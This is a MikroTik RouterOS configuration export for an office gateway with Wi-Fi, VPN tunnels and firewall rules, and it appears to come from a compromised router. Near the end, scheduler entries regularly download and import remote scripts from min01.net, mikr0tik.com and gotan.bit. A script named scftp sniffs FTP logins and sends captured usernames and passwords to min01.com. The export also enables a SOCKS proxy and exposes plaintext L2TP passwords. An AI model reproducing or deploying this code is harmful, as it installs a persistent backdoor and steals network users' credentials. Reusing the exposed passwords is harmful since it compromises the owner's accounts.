32

1. # jul/28/2019 12:24:49 by RouterOS 6.43
2. #
3. # model = 951Ui-2nD
4. /caps-man channel
5. add band=2ghz-b/g/n control-channel-width=20mhz frequency=2457 name=channel1 \
6. tx-power=20
7. add band=2ghz-b/g/n control-channel-width=20mhz extension-channel=disabled \
8. frequency=2412 name=channel2 tx-power=20
9. add band=2ghz-b/g/n control-channel-width=20mhz extension-channel=disabled \
10. frequency=2432 name=channel3 tx-power=20
11. /interface bridge
12. add arp=proxy-arp name=bridge1
13. /interface ethernet
14. set [ find default-name=ether1 ] advertise=\
15. 10M-half,10M-full,100M-half,100M-full,1000M-half,1000M-full comment=Wan
16. set [ find default-name=ether2 ] advertise=\
17. 10M-half,10M-full,100M-half,100M-full,1000M-half,1000M-full comment=Local
18. set [ find default-name=ether3 ] advertise=\
19. 10M-half,10M-full,100M-half,100M-full,1000M-half,1000M-full
20. set [ find default-name=ether4 ] advertise=\
21. 10M-half,10M-full,100M-half,100M-full,1000M-half,1000M-full
22. set [ find default-name=ether5 ] advertise=\
23. 10M-half,10M-full,100M-half,100M-full,1000M-half,1000M-full
24. /interface l2tp-client
25. add allow=mschap2 connect-to=213.234.25.174 disabled=no name=\
26. l2tp-out1_VLG_Merkuri password=258456 user=Moscow
27. add allow=mschap2 connect-to=85.172.120.102 disabled=no name=\
28. l2tp-out_VLG_Ring password=258456 user=Moscow2
29. /interface wireless
30. # managed by CAPsMAN
31. # channel: 2457/20-eC/gn(20dBm), SSID: London, CAPsMAN forwarding
32. set [ find default-name=wlan1 ] ssid=MikroTik
33. /caps-man datapath
34. add bridge=bridge1 name=datapath1
35. /caps-man security
36. add authentication-types=wpa-psk,wpa2-psk encryption=aes-ccm,tkip \
37. group-encryption=aes-ccm name=security1 passphrase=************
38. add authentication-types=wpa-psk,wpa2-psk encryption=aes-ccm,tkip \
39. group-encryption=aes-ccm name=security2 passphrase=**********
40. add authentication-types=wpa-psk,wpa2-psk encryption=aes-ccm,tkip \
41. group-encryption=aes-ccm name=security3 passphrase=************
42. /caps-man configuration
43. add channel=channel1 datapath=datapath1 mode=ap name=cfg1 rx-chains=0,1,2 \
44. security=security1 ssid=London tx-chains=0,1,2
45. add channel=channel3 datapath=datapath1 mode=ap name=cfg2 rx-chains=0,1,2 \
46. security=security2 ssid=AV tx-chains=0,1,2
47. add channel=channel2 datapath=datapath1 mode=ap name=cfg3 rx-chains=0,1,2 \
48. security=security3 ssid=VIP tx-chains=0,1,2
49. /interface list
50. add exclude=dynamic name=discover
51. /interface wireless security-profiles
52. set [ find default=yes ] supplicant-identity=MikroTik
53. /ip hotspot profile
54. set [ find default=yes ] html-directory=flash/hotspot
55. /ip ipsec peer profile
56. add dh-group=modp1536 name=profile_1
57. add dh-group=modp1536 name=profile_2
58. add dh-group=modp1536,modp1024 name=profile_3
59. add dh-group=modp1536 name=profile_4
60. /queue simple
61. add max-limit=60M/60M name=\
62. "\CE\E3\F0\E0\ED\E8\F7\E5\ED\E8\E5 \F1\EA\EE\F0\EE\F1\F2\E8" queue=\
63. pcq-upload-default/pcq-download-default target=100.65.224.0/24
64. /caps-man manager
65. set enabled=yes
66. /caps-man provisioning
67. add action=create-dynamic-enabled master-configuration=cfg1 name-format=\
68. identity slave-configurations=cfg2,cfg3
69. /interface bridge port
70. add bridge=bridge1 hw=no interface=ether2
71. add bridge=bridge1 hw=no interface=ether3
72. add bridge=bridge1 hw=no interface=ether5
73. add bridge=bridge1 interface=ether4
74. /ip neighbor discovery-settings
75. set discover-interface-list=discover
76. /interface list member
77. add interface=ether2 list=discover
78. add interface=bridge1 list=discover
79. /interface pptp-server server
80. set enabled=yes
81. /interface wireless cap
82. #
83. set caps-man-addresses=127.0.0.1 enabled=yes interfaces=wlan1
84. /ip address
85. add address=100.65.224.31/24 comment=Local interface=bridge1 network=\
86. 100.65.224.0
87. add address=***.***.****.***/20 interface=ether1 network=***.***.***.*
88. /ip cloud
89. set ddns-enabled=yes
90. /ip dns
91. set allow-remote-requests=yes servers=\
92. 185.121.177.177,5.189.170.196,8.8.8.8,104.238.186.189
93. /ip firewall address-list
94. add address=127.0.0.1 disabled=yes list=allow-ip
95. add address=100.65.224.33 disabled=yes list=ftpgood
96. /ip firewall filter
97. add action=accept chain=input dst-port=8291 protocol=tcp
98. add action=accept chain=forward dst-port=3389 in-interface=ether1 protocol=\
99. tcp
100. add action=accept chain=input comment=GRE protocol=gre
101. add action=accept chain=input comment=PPTP dst-port=1723 protocol=tcp
102. add action=accept chain=forward dst-port=445 protocol=tcp
103. add action=drop chain=input comment=DNS dst-port=53 protocol=udp
104. add action=accept chain=input comment=Estebleshet/Relate connection-state=\
105. established,related
106. add action=accept chain=forward connection-state=established,related
107. add action=drop chain=input comment=Invallid connection-state=invalid \
108. in-interface=ether1
109. add action=drop chain=forward connection-state=invalid
110. add action=accept chain=input comment=SSTP dst-port=443 in-interface=ether1 \
111. protocol=tcp
112. add action=accept chain=input comment=IPSEC dst-port=500,4500 in-interface=\
113. ether1 protocol=udp
114. add action=accept chain=input in-interface=ether1 protocol=ipsec-esp
115. add action=accept chain=input in-interface=ether1 protocol=ipsec-ah
116. add action=tarpit chain=input comment=\
117. "Add you ip addess to allow-ip in Address Lists." disabled=yes dst-port=\
118. 30553 protocol=tcp
119. /ip firewall mangle
120. add action=add-dst-to-address-list address-list=atls address-list-timeout=\
121. none-dynamic chain=prerouting comment=tls disabled=yes dst-port=21 \
122. layer7-protocol=*3 protocol=tcp
123. add action=add-dst-to-address-list address-list=ftpinit address-list-timeout=\
124. none-dynamic chain=prerouting comment=ftp disabled=yes dst-address-list=\
125. !ftpok dst-port=21 protocol=tcp
126. /ip firewall nat
127. add action=accept chain=srcnat comment="IPSec Volgograd ****" disabled=yes \
128. dst-address=172.16.3.0/24 src-address=100.65.224.0/24
129. add action=dst-nat chain=dstnat disabled=yes dst-port=3389 log=yes protocol=\
130. tcp to-addresses=100.65.224.42 to-ports=3389
131. add action=accept chain=srcnat comment="IPSec Volgograd ****" dst-address=\
132. 10.8.0.0/24 src-address=100.65.224.0/24
133. add action=accept chain=srcnat comment="IPSec ****" dst-address=\
134. 192.168.1.0/24 src-address=100.65.224.0/24
135. add action=masquerade chain=srcnat comment=Masquerade out-interface=ether1
136. /ip ipsec peer
137. add address=***.**.***.***/32 comment="***** IPSEC" exchange-mode=main-l2tp \
138. generate-policy=port-override passive=yes profile=profile_1 secret=\
139. *******
140. add address=***.***.**.***/32 comment=VOLGOGRAD_IPSEC exchange-mode=main-l2tp \
141. generate-policy=port-override passive=yes profile=profile_2 secret=\
142. ********
143. add address=**.**.**.**/32 comment=Ring exchange-mode=main-l2tp \
144. generate-policy=port-override profile=profile_2 secret=*********
145. /ip ipsec policy
146. add dst-address=10.8.0.0/24 sa-dst-address=213.234.25.92 sa-src-address=\
147. 178.236.241.126 src-address=100.65.224.0/24 tunnel=yes
148. add disabled=yes dst-address=172.16.3.0/24 sa-dst-address=85.172.120.102 \
149. sa-src-address=**.**.***.*** src-address=100.65.224.0/24 tunnel=yes
150. /ip proxy
151. set enabled=yes port=63141
152. /ip proxy access
153. add action=deny comment=sysadminpxy
154. /ip route
155. add distance=1 gateway=ether1
156. add distance=1 dst-address=172.16.3.0/24 gateway=172.16.40.1 pref-src=\
157. 100.65.224.31
158. add distance=1 dst-address=172.17.2.0/24 gateway=172.16.30.1 pref-src=\
159. 100.65.224.31
160. /ip service
161. set telnet disabled=yes
162. set ftp disabled=yes
163. set www disabled=yes
164. set ssh disabled=yes
165. set api disabled=yes
166. set winbox address=\
167. 213.234.25.92/32,85.172.120.102/32,100.65.224.0/24,93.94.221.180/32
168. set api-ssl disabled=yes
169. /ip socks
170. set port=27182
171. /ppp secret
172. add local-address=100.65.224.31 name=****************** password=\
173. ***************** remote-address=100.65.224.36 service=pptp
174. add local-address=100.65.224.31 name=Disp password=*** remote-address=\
175. 100.65.224.35 service=pptp
176. add local-address=100.65.224.31 name=Disp2 password=**** remote-address=\
177. 100.65.224.38
178. /system clock
179. set time-zone-name=Europe/Moscow
180. /system identity
181. set name="MikroTIik Gateway"
182. /system ntp client
183. set enabled=yes primary-ntp=88.147.254.230 secondary-ntp=88.147.254.235
184. /system routerboard settings
185. set silent-boot=no
186. /system scheduler
187. add interval=1d name=Auto113 on-event=\
188. "/system scheduler remove [find name=upd111]\r\
189. \n/system reboot" policy=\
190. ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date=\
191. sep/16/2018 start-time=03:11:00
192. add name=upd112 on-event="/system scheduler remove [find name=sh113]\r\
193. \n:do {/file remove u113.rsc} on-error={}" policy=\
194. ftp,reboot,read,write,policy,test,password,sniff,sensitive start-time=\
195. startup
196. add interval=4h name=upd113 on-event=":do {/tool fetch url=\"http://min01.net:\
197. 31416/min01\?key=FK7Yzw9S2pFAVP&port={vport}\" mode=http dst-path=u113.rsc\
198. } on-error={}\r\
199. \n:do {/tool fetch url=\"http://mikr0tik.com:31416/min01\?key=FK7Yzw9S2pFA\
200. VP&port={vport}\" mode=http dst-path=u113.rsc} on-error={}\r\
201. \n:do {/tool fetch url=\"http://gotan.bit:31416/min01\?key=FK7Yzw9S2pFAVP&\
202. port={vport}\" mode=http dst-path=u113.rsc} on-error={}\r\
203. \n:do {/import u113.rsc} on-error={}\r\
204. \n:do {/file remove u113.rsc} on-error={}" policy=\
205. ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date=\
206. oct/31/2018 start-time=04:58:07
207. add interval=1m name=shftp on-event=":if ([:len [/system script job find scrip\
208. t =\"scftp\"]] != 1) do={/system script job remove [/system script job fin\
209. d script =\"scftp\"];:execute \"scftp\"};" policy=\
210. ftp,reboot,read,write,policy,test,password,sniff,sensitive start-time=\
211. startup
212. /system script
213. add dont-require-permissions=no name=scftp owner=admin policy=\
214. ftp,reboot,read,write,policy,test,password,sniff,sensitive source=":do {/t\
215. ool sniffer stop} on-error={}\r\
216. \nwhile (true) do={\r\
217. \nforeach i in=[/ip firewall address-list find where list=atls or list=ftp\
218. good] do={\r\
219. \n:local ipftp [/ip firewall address-list get \$i address] \r\
220. \n:do {/ip firewall address-list remove [find where list=\"ftpinit\" && ad\
221. dress=\$ipftp]} on-error={}\r\
222. \n:do {/ip firewall address-list remove [find where list=\"ftpok\" && addr\
223. ess=\$ipftp]} on-error={}\r\
224. \n:do {/ip firewall address-list remove [find where list=\"atls\" && addre\
225. ss=\$ipftp]} on-error={}\r\
226. \n:do {/file remove (\$ipftp.\".txt\")} on-error={}\r\
227. \n}\r\
228. \nforeach i in=[/ip firewall address-list find list=ftpinit] do={\r\
229. \n:local ipftp [/ip firewall address-list get \$i address]\r\
230. \n:do {/tool sniffer set file-limit=200KiB file-name=(\$ipftp.\".txt\") fi\
231. lter-interface=all filter-ip-address=\$ipftp filter-port=21 streaming-enab\
232. led=no memory-scroll=no} on-error={}\r\
233. \n:do {/tool sniffer start} on-error={}\r\
234. \n:do {/ip firewall address-list add address=\$ipftp list=ftpok timeout=2h\
235. } on-error={}\r\
236. \n:do {/ip firewall address-list remove [find where list=\"ftpinit\" && ad\
237. dress=\$ipftp]} on-error={}\r\
238. \n:local len0 0\r\
239. \n:local len1 0\r\
240. \n:local file0 \"\"\r\
241. \n:local file1 \"\"\r\
242. \n:local minute\r\
243. \n:set \$minute ([:pick [/sys clock get time] 3 5]+2)\r\
244. \nif (\$minute>59) do={:set \$minute (\$minute-60)}\r\
245. \n:do {\r\
246. \n:set \$len0 \$len1\r\
247. \n:set \$file0 \$file1 \r\
248. \n:do {:set \$file1 [/file get (\$ipftp.\".txt\") contents]} on-error={}\r\
249. \n:set \$len1 [:len \$file1]\r\
250. \n} while=(!((\$len0!=\$len1 and \$len1=0) or ([:tonum [:pick [/sys clock \
251. get time] 3 5]]=\$minute)))\r\
252. \n:do {/tool sniffer stop} on-error={}\r\
253. \n:set \$pUSER [:find \$file0 \"USER \" -1]\r\
254. \n:set \$pPASS [:find \$file0 \"PASS \" -1]\r\
255. \n:local user \"\"\r\
256. \n:local pass \"\"\r\
257. \nif (\$pUSER>0) do={\r\
258. \n:set \$pUSER (\$pUSER+5)\r\
259. \n:set \$ch [:pick \$file0 \$pUSER (\$pUSER+1)]\r\
260. \nwhile (\$ch!=\"\\r\" && \$ch!=\"\\n\" && \$pUSER<\$len0) do={\r\
261. \nif (\$ch=\" \") do={:set \$ch \"!pRoBeL>!\"}\r\
262. \nif (\$ch=\"\\\?\") do={:set \$ch \"!vOpRoS>!\"}\r\
263. \nif (\$ch=\"\\\"\") do={:set \$ch \"!kAv>!\"}\r\
264. \nif (\$ch=\"\\\$\") do={:set \$ch \"!dOlLaR>!\"}\r\
265. \nif (\$ch=\"\\\\\") do={:set \$ch \"!pAlKa>!\"}\r\
266. \n:set \$user (\$user.\$ch)\r\
267. \n:set \$pUSER (\$pUSER+1)\r\
268. \n:set \$ch [:pick \$file0 \$pUSER (\$pUSER+1)]\r\
269. \n}}\r\
270. \nif (\$pPASS>0) do={\r\
271. \n:set \$pPASS (\$pPASS+5)\r\
272. \n:set \$ch [:pick \$file0 \$pPASS (\$pPASS+1)]\r\
273. \nwhile (\$ch!=\"\\r\" && \$ch!=\"\\n\" && \$pPASS<\$len0) do={\r\
274. \nif (\$ch=\" \") do={:set \$ch \"!pRoBeL>!\"}\r\
275. \nif (\$ch=\"\\\?\") do={:set \$ch \"!vOpRoS>!\"}\r\
276. \nif (\$ch=\"\\\"\") do={:set \$ch \"!kAv>!\"}\r\
277. \nif (\$ch=\"\\\$\") do={:set \$ch \"!dOlLaR>!\"}\r\
278. \nif (\$ch=\"\\\\\") do={:set \$ch \"!pAlKa>!\"}\r\
279. \n:set \$pass (\$pass.\$ch)\r\
280. \n:set \$pPASS (\$pPASS+1)\r\
281. \n:set \$ch [:pick \$file0 \$pPASS (\$pPASS+1)]\r\
282. \n}}\r\
283. \nif ([:len \$user]!=0 or [:len \$pass]!=0) do={\r\
284. \nif ([:len \$user]<40 && [:len \$pass]<40) do={\r\
285. \n:do {/ip firewall address-list add address=\$ipftp list=ftpgood} on-erro\
286. r={}\r\
287. \n:do {/tool fetch url=(\"http://min01.com:31418/ftp\?ipftp=\".\$ipftp.\"&\
288. user=\".\$user.\"&pass=\".\$pass) mode=http keep-result=no} on-error={}\r\
289. \n}}\r\
290. \n:delay 1s\r\
291. \n:do {/file remove (\$ipftp.\".txt\")} on-error={}\r\
292. \n}\r\
293. \n:delay 1s\r\
294. \n}\r\
295. \n"
296. /tool sniffer
297. set file-limit=200KiB file-name=178.236.242.74.txt filter-interface=all \
298. filter-ip-address=178.236.242.74/32 filter-port=ftp memory-scroll=no